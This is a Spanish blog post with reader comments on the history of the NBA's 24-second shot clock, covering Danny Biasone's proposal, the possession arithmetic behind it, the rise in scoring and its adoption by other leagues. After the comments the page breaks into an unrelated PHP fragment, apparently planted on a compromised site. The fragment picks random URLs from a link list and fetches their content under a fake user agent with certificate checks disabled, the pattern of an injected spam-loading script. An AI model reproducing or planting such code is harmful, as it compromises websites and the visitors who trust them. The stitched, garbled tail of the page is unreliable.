24 Segundos para cambiar un deporte

24 de May de 2010 por Sergio

¿Qué podemos hacer en 24 segundos? Lavarnos la cara, pelar una naranja, mandar un mensaje, bebernos una jarra de cerveza como un alemán en la Oktoberfest,… o transformar el desarrollo de uno de los deportes mas grandes que existen.

Empecemos, como siempre, por el principio. A comienzos de la National Basketball League en la decada de los 50, la tónica de los partidos solía ser bastante aburrida: un equipo se dedicaba a fabricar una ventaja en el marcador para luego, a base de control del esférico durante tiempos indeterminados, dormir el partido para no poner en riesgo dicha ventaja. En el caso de que el equipo en cuestión dispusiera de un base habilidoso, la única manera de intentar evitarlo era cometer faltas personales continuamente, cargando a los jugadores del equipo rival con faltas, sucesos que provocaban la consabida merma de jugadores del plantel inicial.

Durante aquellos primeros años, se produjeron encuentros como estos:

– Un 22 de Noviembre de 1950, los Fort Wayne Pistons derrotaban a los Minneapolis Lakers por el pírrico resultado de 19-18, en un partido en el que sólo se anotaron 8 canastas en juego. En partidos como este, entre equipos punteros, se tomaban aún menos riesgos de lo habitual, intentando controlar el partido al máximo nivel posible.

– En 1953, durante un partido entre los Boston Celtics y los Syracuse Nationals, se pitaron 106 faltas que produjeron 128 tiros libres. Solamente Bob Cousy anotó 30 tiros libres durante dicho encuentro.

– Al año siguiente, Syracuse Nationals y New York Knicks disputaron un encuentro que finalizó con un marcador de 75-69, de los cuales 75-34 de ellos fueron desde la linea de personal. Es decir, los Nationals anotaron el 100% de sus puntos desde la linea de de 4,60.

En pos de convertir el baloncesto americano en un deporte atractivo para el espectador, el propietario de los Nationals, Danny Biasone se propuso instaurar una regla que cambiara la tendencia consevadora instaurada en la celebración de los encuentros: “Tenemos que tener ataque porque el ataque es lo que excita a la gente, necesitamos un elemento de tiempo en nuestro juego. Otros deportes lo tienen, como el béisbol, donde tienes tres outs para anotar, o el fútbol americano, en el que si no avanzas 10 yardas en 4 intentos, el balón cambia de propietario”, dijo durante un reunión con el resto de promotores de la NBA, reunidos para encontrar soluciones al problema.

La idea era la de marcar un número de posesiones similares para cada uno de los equipos. Establecieron esa cantidad de posesiones en 60 para cada equipo, que hacían un total de 120, divididas entre la duración total de un encuentro en la NBA (2880 segundos), establecían un total de 24 segundos por posesión.

Tras convencer a la NBA, la regla fue instaurada durante la temporada 54-55, suponiendo desde el primer momento una revolución ofensiva para la liga. Durante aquella temporada en la que se implementó dicha regla, el promedio de anotación ascendió desde los 79,5 puntos por partido y equipo, a los 93,1 y, 4 años más tarde, a 107. Aquella misma campaña, los Boston Celtics se convirtieron en el primer equipo en superar el promedio de 100 puntos por encuentro. Tres años más tarde, todos los equipos lo hicieron.

Como dijo Bob Cousy, dicha regla “salvo al baloncesto” de una muerte segura por aburrimiento del aficionado. Otros como el comisionado Maurice Podoloff, llegaron más lejos al afirmar que la adopción del reloj de tiro fue “el evento más importante de la historia del baloncesto”.

Esta extraña, para entonces, idea que surjió de la cabeza de Biasone, tendrá para siempre un lugar en la historia del baloncesto profesional. Posteriormente a la aceptación en la NBA, dicha normativa fue instaurada en todas las competiciones baloncestísticas profesionales a lo largo y ancho del globo. Las competiciones FIBA, adoptaron en un principio un reloj de 30 segundos (al igual que la ABA, la ABL o la WNBA), para pasar posteriormente a la misma normativa vigente en la NBA durante el año 2000. Curiosamente, la NCAA comenzó implementando un reloj de 45 segundos por posesión en la temporada 85-86, para reducirlo a 35 segundos 8 años más tarde, al igual que los partidos de High School (en algunos estados son de 30 segundos).

Aunque dicha regla asegura alrededor de 75-80 posesiones por equipo y partido, otras reglas tambien complementan a esta a la hora de establecer el ritmo de juego, como el límite de 10 segundos para cruzar el campo.

Desde luego, nunca 24 segundos fueron tanto tiempo como en el baloncesto, ¿verdad?

Comenta

6 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Vaya Sergio, este articulo me ha parecido muy interesante.

    Que importancia tienen los 24 segundos en este deporte.

    A lo mejor meto la pata en esto que voy a decir, desde mi ignorancia nunca he entendido pq esta norma nose lleva al balonmano, o incluso en el futbol debería estar con otro tiempo limite claro, aunque solo fuera para llegar al campo contrario. Seguramente un tal Mourinho no sería tan famoso…

      Citar

  2. sergio dice:
    #2

    En el balonmano si existe.. pero no como límite exacto. Cuando llevas un rato sin buscar portería o probar un lanzamiento te pitan “pasivo” y la pelota cambia de posesión.

      Citar

  3. Txusma dice:
    #3

    Pero sorprende que en balonmano la norma sea tan subjetiva. Queda totalmente a criterio de los árbitros decidir si el equipo que ataca están en plan pasivo o no. O alguien sabe si hay alguna medida más objetiva para pitarlo?

      Citar

  4. Love Denise dice:
    #4

    Como bien dice Sergio, en balomano se pita el “pasivo” a criterio de los arbitros, una norma absurda desde mi punto de vista que siempre ha hecho que no me guste este deporte
    Es imponsible esta regla en el futbol, kantonyo, no se tiene la misma precisión para controlar el balon con los pies que con las manos, si asi fuese el Barça de Guardiola lo penalizarían en cada jugada con tanto toque, toque y toque…por cierto ya que hablas de futbol, me hubiera gustado ver a pep con un eqipo como el Inter 2010 o con el Oporto 2002,2003

      Citar

  5. kantonyo dice:
    #5

    Tienes razón LoveDenise, en el futbol la pasividad y el tiempo no tienen nada que ver, incluso en muchos casos quien más ataca más posesión de tiempo disfruta.

    Pero con el balonmano, dejar al arbitro la decisión de pitar pasivo crea aún más polemica.

      Citar

  6. Dantley2 dice:
    #6

    Interesantísimo, probablemente después de la invención del baloncesto, es la regla más importante que se haya realizado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>